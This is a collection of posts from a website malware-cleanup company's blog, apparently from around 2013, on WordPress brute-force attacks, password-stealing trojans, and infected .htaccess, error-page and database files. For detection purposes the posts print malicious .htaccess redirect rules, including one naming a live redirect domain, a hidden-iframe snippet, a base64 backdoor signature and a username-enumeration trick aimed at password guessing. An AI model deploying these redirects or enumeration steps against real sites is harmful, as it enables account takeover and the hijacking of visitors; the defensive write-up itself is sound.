By

The recent widespread attack on WordPress sites

While we may not have been the first to report this, we have been quietly gathering information and watching.

First, I’d like to start off by saying that this is the “current” attack and most of the suggestions online are temporary fixes for this attack. What about the rest of the time? What about the next attack?

Next, blocking by IP is not going to work. This botnet is so large that the IP addresses could come from anywhere: overseas or even here in the US. This is like blocking user-agents and other easily spoofable settings. Hackers are too smart for this.

Setting your .htaccess to only allow access to your wp-admin or wp-login.php is not going to work for everyone. Most people are still on dynamic IP addresses, so locking it down to a select group of IP’s will lock you out and yes you could go into FTP and delete, but who is going to do that on a regular basis? And, are you going to go back after you’ve logged in and change that .htaccess again? and again?

We have seen in more recent attacks that once the hackers infect a local computer, they can launch their attack from there. So the IP address looks like the attack came from your computer.

Also, changing the location of the wp-admin or wp-login.php file is going to help you on this attack, but the more frequent attack we see is the password stealing trojan.

This trojan has infected PCs and Macs and it steals the URL, username and password sequence. You could change the URL to:www.yourdomain.com/wp-dontthinkyoulleverguessthis.php and change your username to: rumplestiltskin and have a password that’s twice as long as the english alphabet and you’re still going to have an infected website if you have the password stealing trojan.

If you want to know the username, even if it’s been changed and admin removed, try this with your URL:

http://yourdomain.com/blog/?author=1

Replace the above URL before the ? with the exact URL to your blog. If you get a valid response, you know that you have the admin user still intact. If you’ve changed the admin user or deleted it, you’ll get a response that says something like:

Sorry, but you are looking for something that isn’t here.

To keep searching, change the 1 to a 2 and see what happens. If you get a valid response your URL will have something like:

http://yourdomain.com/author/newadminhere/

Now you know the userID and the username name. Add your dictionary of passwords and continue.

You could also password protect the wp-admin folder with an .htaccess file. Guess what? The password stealing trojan steals all the information to a successful login even the secondary passwords.

Over the past 2 weeks, we’ve cleaned 1,978 infected websites and 1,755 of them were compromised due to the password stealing trojan. (62% of the people we’ve helped were using Macs). We have the log files to prove it. We see a website owned by someone here in the US and we see successful logins from all over the world. That is proof.

We hear all the time, “I don’t need anti-virus because I’m on a Mac”. Or, “I don’t have a virus. I know what websites to stay away from.” Really? Because that persons website was infected and was attacking a browser exploit on the computer’s of visitors to his site. Surely that person must stay away from their own website then, right?

What does work?

Keep your local computer clean. Install something to detect malicious behavior.

Two-factor authentication works. Captcha is good for now, but we keep seeing reports where hackers have cracked many captchas. But for the automated attacks of hackers, it works well.

Use something like LastPass or on a Mac use KeyChain. Do not save the login credentials in your browser – DO NOT! This is too easy for hackers to steal.

Create a separate user on your local computer and use that for day-to-day work and only log in as administrator when you need to do updates or install software. Keep in mind that when a virus/trojan breaches your computer it has the same access as the currently logged in user. If you have admin rights, guess what? So does the virus/trojan.

In our honeypot analysis of this current attack, it appears that while the hackers are using a dictionary attack of pre-created passwords, they also have buried in their password lists legitimate passwords stolen from computers.

We see the attempted passwords and too many of them are so bizarre that they couldn’t have been part of a computer generated password dictionary.

If you want to hide your real intention, why not bury it inside a larger attack that will cause a lot of frenzy and confusion?

We believe the hackers responsible for this attack are sitting back and laughing at the frenzy they’ve created knowing that their real intention totally slipped by everyone – well almost everyone.

By

Hackers using errors to redirect websites

Our website malware removal service has removed malware from over 151,000 websites, our most recent cleanings have seen hackers adding malicious code to 500.php files (which handles website errors of a specific type), and then creating some hidden error in a website to cause the site to call the 500.php file and thus run their malicious code.

The strategy isn’t new, but the method we found recently was quite unique.

The sites we were working on were WordPress sites. The owners of these sites were very diligent about keeping their WordPress core files updated and their plugins too, however, they were less diligent about keeping their own local computers safe.

You see, all of these particular site owners were Mac users. I don’t have anything against Macs, but the fact that Mac users have been told for so long that they don’t need any anti-virus software leaves them vulnerable.

Whether it’s because Macs have finally reached enough popularity, or hackers know most Mac users don’t have any method to detect them, Macs are on the radar of hackers.

We will be posting steps to follow to make your Mac more difficult for hackers to infect your Mac investment.

The specific malicious code found in the 500.php files won’t be posted here because we found some quite radically different code in the sites we’ve recently cleaned. Let’s just say that you check all of your error pages for anything that doesn’t look like it belongs.

The common thread in these most recent website malware cleanings was that they were all WordPress sites and each one of them, after we removed the malicious code in the error files, would redirect to the /wp-admin/install.php file and give us a 500 error. Upon further investigation (thank you Ty) it was discovered that the database table prefix in the wp-config.php file specified wp_ but the actual tables in the database had prefixes that were quite different. This was the error that the hackers were producing.

By changing the table name prefix, there wasn’t any specific file evidence of anything being changed, except for the 500.php files, but most people see those, know they were put there by the hosting provider and never think twice about them.

The strategy here was to infect the page that an error would redirect to and then create a hidden error to cause that error page to be run. Wile-E-Coyote, Super Genius!

I know what you’re thinking (did he fire 6 shots or only 5…) not that. If the website owners had kept everything up-to-date, how did the hackers gain access?

As mentioned, each of these specific infected websites were owned or operated by people with Macs. In our forensic analysis of website infections we always review the log files if available. In each case we found evidence of IP addresses from outside the country of the website owner being used to login to the WordPress dashboard.

Of course many people tell us that’s impossible because they have passwords that are 12 characters long and have a combination of upper and lower case letters, numbers and special characters. Or in a few of these cases, the people had followed the popular WordPress security recommendations and removed the admin user and also used plugins that allowed them to change the name and location of the wp-admin folder. How does a hacker breach a website that has followed all of these steps?

With WordPress being so popular and many people having websites, hackers know that if they infect a local computer, chances are good that the user will have some login to a website. The hackers put keyboard loggers on local computers and just wait for the user to login to a website.

What do they record?

The URL, the username and password. Even if your login URL has been changed to mydomain.com/837ujdndtgkdhghs6s0d6 and your username changed to Rumplestiltskin and your password is nothing short of “Supercalifragilisticexpialidocious” with every other “a” replaced with @ and every third “i” replaced with either a “1″ a “l” or an “!”, the hackers malware on your local computer will steal all that information.

Keep in mind, hackers only need one way in to your website. You must know their methods and block them all.

In order to keep your website safe and secure you must be certain that everyone who you provide login rights to for your website, has their local computer fully secured. Otherwise, you’ll be calling us to help you clean your site.

By

Twitter iframes

Over the past few weeks we’ve cleaned many infected websites that have been infected with an iframe named Twitter. This iframe has nothing to do with Twitter, but that’s what the hackers named it.

It starts out like:

< ifr ame name=Twitter scrolling=auto frame border=no align=center height=2 width=2

where the height and width can be other numbers as well. If this line of code is in a .js file (javascript) then it will probably start with:

docu ment .write(‘< ifr ame name=Twitter scrolling=auto frame border=no align=center height=2 width=2

This type of infection is usually accompanied by code added to the .htaccess files similar to:


RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://(some malicious domain and querystring goes here) ?h=1459447 [L,R]

We haven’t always seen the modified .htaccess files but generally there will be some “sprinkled” throughout an infected website.

This has been due to compromised login credentials. Many people don’t believe us or want to hear that, but it’s a fact. In all cases where we’ve had access to the FTP logs, we see lines like:

Mon Jan 28 09:35:05 2013 0 xxx.xxx.xxx.xxx 239 /home1/(path to website files/public_html/wp-includes/Text/.htaccess b _ i r user@domain ftp 1 * c

The i before the r and the username indicates this file was uploaded to your site. If this line in the logs were from someone downloading a file to their local computer or another location, it would have an o.

This activity in a log file shows us that someone from source IP of xxx.xxx.xxx.xxx uploaded a file named .htaccess of 239 bytes to this folder using user@domain on January 28. When we look in the above referenced file it has the Rewrite code listed above. From this we know that a malicious file was uploaded to that site using the username specified. How did this “someone” get that username?

Most likely from a virus on a computer used to legitimately upload files. Yes, even Macs are susceptible.

We also see from the log files that other backdoors have been uploaded. These have to be found and removed or your site will get re-infected again and again.

If you’ve fallen victim to this type of infection, please let us know.

Thank you.

By

Attack of the default.php files

We’ve been seeing many infected websites that have numerous default.php files “sprinkled” throughout the site.

These files are being used by hackers to infect other websites.

The code inside the default.php files usually starts with:

eval (gzinflate ( base64_decode ("...

The file will usually be either 2,858 or 2,556 in size.

These files are uploaded to the website via FTP.

How do hackers upload files to your site with FTP?

They have stolen your password!

If you have access to your FTP log files, you will see some entries like this:

Sun Jan 13 21:41:48 2013 0 XX.XX.XX.XX 2848 /home/(name of your account)/public_html/default.php b _ i r ftpaccount ftp 1 * c

The ftpaccount shown in the log entry will be the one that has been used by the hackers to upload the default.php files to your site. Whoever is using that account legitimately could be the using the computer with a virus on it that has stolen the passwords.

The default.php files are also used to upload malicious .htaccess files. Those files will have something like this:

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http: //[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

RewriteRule ^.*$ http: //le-guide-thalasso-sainte-maxime. com/wapn.html?h=1415319 [L,R]

We’ve seen various domains inserted into that last line but the format is basically the same: URL/randomname.html?h=(some numbers)

First thing is to change all your passwords: hosting account, FTP, website (WordPress, Joomla or other…). Then DO NOT log back in again until you have scanned all your computers – yes even Macs.

Next, reviewing the log files will show you where on your site the files were uploaded and then you can delete those files. Check your .htaccess files for any code similar to the above. If there was already a .htaccess file in that folder, they have added their malicious redirects. The above lines can simply be removed from your file.

If there wasn’t already a .htaccess file there then the hackers have added one and it can just be deleted.

Again, please run daily virus scans on all computers – daily. When your anti-virus program updates, it typically doesn’t run a full scan. So any updates you received today on your anti-virus program will not detect anything already on your system until you run a full scan. The updates will only protect your computer from the new infections.

With this infection there are typically additional backdoor shell scripts added to the site as well. Those have generally been something using the base64_decode string so you can search your files for that and then further analyze the file to determine if it’s malicious or not.

If you need help cleaning this up, please send me an email at: traef@wewatchyourwebsite.com

Thank you.

If you found this useful, please share it.

By

“Industry leaders…”

This is going to be somewhat of a rant.

In reading many blogs and websites, many of them in our own industry, we see variations of the term, “industry leading”.

I started doing some research on this and I have some questions.

If you’re a startup, how can you be leading the industry right out of the gates? I started this company back in 2008 and I don’t ever think about calling us industry leaders. We’ve cleaned over 138,000 websites and I don’t think about labeling us as industry leaders.

Even if you started your company years ago, by what standard do you consider yourself “the” industry leader?

Who is the industry leader?

I have no idea. I just know that if everyone is labeling themselves as industry leaders, are we at the bottom? I don’t think so. Our customers don’t think so.

If you look up self-proclamation (self proclaimed industry leaders) on wikipedia.com, you’ll see this definition:

describes a legal title that is only recognized by the declaring person and not any recognized legal authority

To me, self-proclamations are worthless.

What do you think?

By

“Why would hackers want my site?”

This is a question we’re asked all the time.

As I read this article I thought it was one good answer to why hackers want your site:

http://www.darkreading.com/threat-intelligence/167901121/security/attacks-breaches/240145920/bank-ddos-attacks-employ-web-servers-as-weapons.html
broken-piggy-bank

One comment I have about the above article. It uses the term web servers when they should be saying web sites.

This article provides more insight into the attacks.

Bank DDoS Attacks Using Compromised Web Servers as Bots

When you read the second article, notice the username and password used on the website: admin/admin. We see this frequently.

We have cleaned thousands of websites that are being used in these DDoS attacks on banks. The cybercriminals find a point of entry, exploit it, upload their script files and then coordinate the attack from a remote location.

First line of defense is a strong password.

The next line of defense is to keep your software; WordPress, Joomla, whatever, up-to-date at all times.

If you have any thoughts or comments about this, please share.

Thank you.

By

SQL injections on websites carrying backdoor scripts

We’ve seen this for awhile now, but recently it seems to be a growing trend.

Many of the websites we’ve been cleaning have the backdoor scripts injected into the SQL database so that when the webpage is accessed, the backdoor is available, but invisible to the visitor.

To a hacker who knows what page or which website is carrying their code, it’s easy for them to send a string of code and on their screen the backdoor shell script appears.

When we have the access logs available to us, we have analyzed them and it does not appear to be a regular SQL injection (SQLi), but it does appear that the hackers find a point of entry to the website, then search for the file that contains the database information. They upload a shell that provides them with something like phpmyadmin, then they add their infectious code to selective fields in the database.

We know that many people believe that moving their wp-config.php file outside of the public_html folder keeps their database login information safe. This is not true. When a hacker infects a website, they typically have full access to the hosting account. This includes the areas outside of public_html. We’ve seen this thousands of times.

At times the code has been an infectious iframe or other javascript string, however, finding full backdoor shells buried in the SQL database is even more alarming. The hackers have created various ways of hiding this so when a legitimate user visits the website they don’t see any suspicious code. When a hacker sends their code to the specific webpage, it opens their backdoor shell. This will hide their code from many of the online scanners. We still feel these online scanners are helpful, but the hackers are finding various methods to hide their activities.

This makes repeat infections extremely easy for the hackers. As a website owner you could be searching all the code on your site and find nothing. To find this malicious code, you’ll have to export your database and then scan it for any script tags and for any php tags. If you find any, you’ll have to analyze the string to determine if it’s malicious or not.

One key we’ve found is that their backdoor shells need a field in the database that’s large enough to contain their lengthy code – at least for the backdoor shell scripts. Smaller javascript or iframe infections could be anywhere in the database. You’ll have to be familiar enough with the database layout for your website to know where to look.

If you’ve been subjected to repeat infections, you might want to look in your database. Even if you haven’t been subjected to repeat website infection, you might still want to look in your database to see what might be lurking.

If you need help analyzing your database, please send an email to: traef@wewatchyourwebsite.com.

If you have any more insight to this infection, or have additional questions, please leave a comment.

Thank you.

By

Pinterest being used by cybercriminals

Pinterest interesting to cybercriminals
Pinterest interesting to cybercriminals

It didn’t take long for hackers to take advantage of the social networking site: pinterest.com.

If you’re not familiar with Pinterest, it’s a site where you can create a “board” and you then “pin” video or graphic image files of anything that interests you.

Friends, family, acquaintances, can re-pin your pinned interests and so on…

Recently, cybercriminals have been posting images of Starbuck’s gift cards and free Coach wallets and purses (handbags as my wife prefers).

The potential victim will have to visit a particular site to claim their “prize”.

The scam begins when you visit that site, you’re redirected to a website that first requires you to re-pin the image, so they can spread their “generosity” further, then clicking on a link to a survey site – which is a scam.

Cybercriminals are very adept at scams like these. They know that by asking you to re-pin their pin, they believe that people you know will help spread their scam.

Some of the redirects are to CPA (cost-per-action) sites where the cybercriminals are paid to drive traffic to these sites. Other sites the unsuspecting victim is redirected to asks them to install toolbars, backgrounds and other seemingly “harmless” utilities. Cybercriminals also get paid for these installations as pay-per-installs.

Some redirects we followed actually asked for personal information. We believe this could eventually be used to steal identities which are then sold to other cybercriminals.

People always ask us why hackers hack. This is one method they have of making money. While this method may not directly infect or attempt to infect your computer, it feeds the cybercriminals with more income.

If you’ve followed any of these, please share your experience below. If you know someone who is using Pinterest.com, please let them know about this scam.

Thank you.

By

“you need to pay for this crypt” infection

We’ve been seeing a lot of this lately, infected websites that have the wording,

you need to pay for this crypt

over and over a few times across the top of the webpages.

This is usually accompanied by some script tags that try to infect the visitor with the Blackhole Kit. (The Blackhole Kit is an exploit used by hackers to try and infect the visitor’s browser with a variety of viruses, trojans and other malware)

On WordPress websites we’ve seen this in the index.php files all over the website. It’s an indication that your website has been infected and needs to be cleaned and hardened.

You can begin by removing the malscript immediately preceeding this text. You can look in the wp-content/index.php which is normally about 30 bytes. With anything malicious in there it will be much larger in file size.

Then, make certain that your WordPress is updated and all plugins too.

We’ve also been seeing many WordPress sites infected due to hackers logging into their wp-admin.

Why?

Because there are still many people who believe that having admin as a user and admin as a password is acceptable. Too many people believe that, “Hackers only want the bigger, more heavily visited websites. They won’t bother with mine.”

People. Hackers want all websites. The amount of “low-hanging fruit” needs to be drastically reduced – or better yet, eliminated.

Change your passwords immediately. Make them strong. Make them at least 10 characters and use upper case, lower case, numbers and some punctuation. Take some phrase and convert to a combination of the above.

Take for instance the movie Oceans 11. That can be converted into:

0c3@n$_elEv3N_+h3_MoV1E

Yes, it’s more difficult to remember. But what’s worse? Remembering your password, or having your website constantly infected?

If you need help cleaning up from an infection, please email me at traef@wewatchyourwebsite.com.

Thank you.

By

Proper use and configuration of timthumb.php

With many themes using the timthumb.php and thumb.php files, we thought we should update our readers with the latest on timthumb.php.

First, make certain you have the latest:
http://timthumb.googlecode.com/svn/trunk/timthumb.php

As of this post, the current version is 2.8.9.

Open that file and inside you’ll this line to verify you have the correct version:

define (‘VERSION’, ’2.8.9′);

Scroll down a few lines and you’ll:

if(! defined(‘ALLOW_EXTERNAL’) ) define (‘ALLOW_EXTERNAL’, TRUE); // Allow image fetching from external websites. Will check against ALLOWED_SITES if ALLOW_ALL_EXTERNAL_SITES is false

This means that if the ALLOW_EXTERNAL parameter is set to TRUE, like it is here, and the parameter ALL_ALL_EXTERNAL_SITES is false, then timthumb.php will check the included link to see if it’s in the list of ALLOW_SITES.

If you at the next line down in this file you’ll see:

if(! defined(‘ALLOW_ALL_EXTERNAL_SITES’) ) define (‘ALLOW_ALL_EXTERNAL_SITES’, false); // Less secure

With these 2 parameters set the way they are, timthumb.php will only show files from the list of ALLOWED_SITES. Next we need to examine the sites listed in ALLOWED_SITES.

Scroll down a few more lines and you’ll see:

// If ALLOW_EXTERNAL is true and ALLOW_ALL_EXTERNAL_SITES is false, then external images will only be fetched from these domains and their subdomains.
if(! isset($ALLOWED_SITES)){
$ALLOWED_SITES = array (
'flickr.com',
'staticflickr.com',
'picasa.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
'imgur.com',
'imageshack.us',
'tinypic.com',
'yourdomainhere',
);
}

Now in the line where we have: ‘yourdomainhere’ you would replace that with your website domain. For us, it would be ‘wewatchyourwebsite.com’. A few things to note here. If you don’t ever expect to load images from the other sites, then delete them as well while you’re in here.

What we’ve done is to allow timthumb.php to show files that are stored on your website and the locations above that. Any other domain will not be accepted and will not show. If you don’t do this, then hackers could include files from their websites and infect your website with their malicious code.

This version of timthumb.php does use a non-web folder for cache, so it is more secure, but configuring it this way adds another layer of protection to your site, and we do believe in defense in layers.

If you have questions about this information or you’re having trouble configuring it properly for your site, please post a comment and we’ll help you.

Thank you for reading.